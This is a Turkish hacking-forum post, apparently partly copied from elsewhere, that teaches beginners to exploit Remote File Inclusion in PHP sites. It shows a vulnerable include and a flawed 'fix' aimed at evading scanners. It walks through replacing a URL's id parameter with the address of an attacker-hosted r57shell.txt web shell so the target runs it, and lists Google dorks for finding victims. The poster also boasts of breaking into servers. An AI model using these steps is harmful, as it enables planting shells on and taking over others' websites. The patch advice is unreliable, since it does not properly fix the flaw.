Ben bir kaç Sunucuya girdim. İçinde eskileri tam ayıklamadım ama Bu bir script ve hangisini çıkarabilirizki. Ya çıkardığımız açığı taşıyorsa. Ben 50 ye yakın yeni açık ekledim Mükemmel sonuçlar verdi. Senin zamanın varsa eski olarak düşündüklerini silebilirsin O kadar biliyorsan. Ben Silmek yerine eklemeyi tercih ettim. Buda Benim Paylaşım anlayışım.
İndirdiğiniz Scriptin PHP İle Kodlandığını Varsayalım.RFI Taracağımız Dosyanın adı rfiscript.php olduğunu var sayıyoruz.
Kod:
<?php
include ($degisken. �../function.php�);
?>
Bu Scriptte RFI Açığı Olduğunu Anlarız.Bu Scripti Bulduğumuz Sitede Açık Tarayabiliriz.Peki bu Açığı Nasıl Kaparız.?
Kod:
<?php
$degisken = �data�;
include ($degisken. �../function.php�);
?>
Açığı bu şekilde kapatırız.Ne Yaptık;
Sistemde kullanılmayan bir degisken isimile degişkene deger verdik.Hacker bu sayfada RFI Açığı tarattığında RFI Açığı bulamayacaktır..RFI Açığının bulunmasını engelledik..
2-) Hedef Siteyi Scanner Programları ile Tarayarak RFI Açığı Bulma.
Hedef Sitemizin Adı www.xxx.com olsun.Biz bu sitede RFI Açığının olup olmadığını anlamaya çalışacağız.Şimdi bir Web Security Scanner programı ile hedef sitemizi tarayacağız.Ben Örnek olsun diye bir program ismi veriyim.
Acunetix Web Vulnerability Scanner.Türkçesi Acunetix Web Güvenlik Açığı Tarayayıcısı gibi bişey. İngilizcem pek kuvvetli degildir.
Programımızla hedef sitemizi tarattığımızda sitede RFI Açığı olup olmadığınız zaten uyarı olarak size verecektir.Ama ben programla açık taratma taraftarı degilim.Çünkü bu işi siz ögreneceksiniz program degil..
2-) Hedef Site Üzerinde Manuel(Elle) Olarak RFI Açığı Taramak.
Şimdi size tekrar hedef sitemiz olan www.xxx.com üzerinden manuel açık tarayamayı anlatacağım.
Sitemizde bir id değeri ararız.Buldugumuz id değerinde RFI açığı tararız.Nasılmı?
www.xxx.com/sayfa.php?id=1
Gerekli olan bir şey daha belirteyim.Kendi hostunuza atılmış bir txt uzantılı shell..Oda www.sitemiz.com/r57shell.txt?
Şimdi hedef sitemizdeki id değerinin sonundaki rakam/harf/karakter herneyse siliyoruz ve kendi sitemizdeki txt uzantılı shell adresini yazıyoruz.
ekrana r57shellimiz yansır ise bir RFI Açığı bulmuşsunuz demektir.Bir Screnn ile anlatayım bunu; (Shell yansıması)
Bu resim otomatik olarak küçültülmüştür. Resmin tam görünümü için tıklayın. Orjinal resim boyutu 993x838.
This image has been resized. Click this bar to view the full image. The original image is sized 993x838.
Evet.Bu şekilde bir Shell yansıması olur ise hedef siteye shell sokulmuş demektir.
RFI Açığının Bir Dorku Varmıdır?
RFI Açığının belirli bir dorku yoktur.PHP ve ASP vs vs sayfalarda olabilir.Şimdi ben buraya binlerce dork yazabilirim ama zamanımız kısıtlı bu yüzden bir kaç örnek dork vereyim.
inurl:"page?id="
inurl:"open?id="
inurl:"go?id="
ve Sonrası...
Evet arkadaşlar.Bakalım neler öğrenmişiz ve daha neler yapabiliriz;
RFI�ın ne olduğunu, Açığı nasıl bulunacağını,Scriptte nasıl tespit edilin nasıl kapatılacağını, bulduğumuz açığı kullanıp nasıl shell sokabileceğimizi ve belli başlı RFI Dorklarını öğrendik.Şimdi gelin bu shell soktuğumuz siteye neler yapılabileceğine bakalım. Alıntı Yaptım Googleden tarattım ilk bu Çıktı bende Paylaştım.
Rica Ederim Amacımız Yeni başlayanlara En başından Yardımcı olabilmek. Bazı paylaşımlar Bana ait değildir. Kimse yanlış anlamasın. Önemli olan gerçekten İşe yarayadak bir Paylaşım Olursa Hemen Burda paylaşıyorum. Kendi arşivimi Eve gidince Paylaşırım. Şu anda evimden çok Uzaklardayım. Bunlar Yandex diskimde bulunanların Bazıları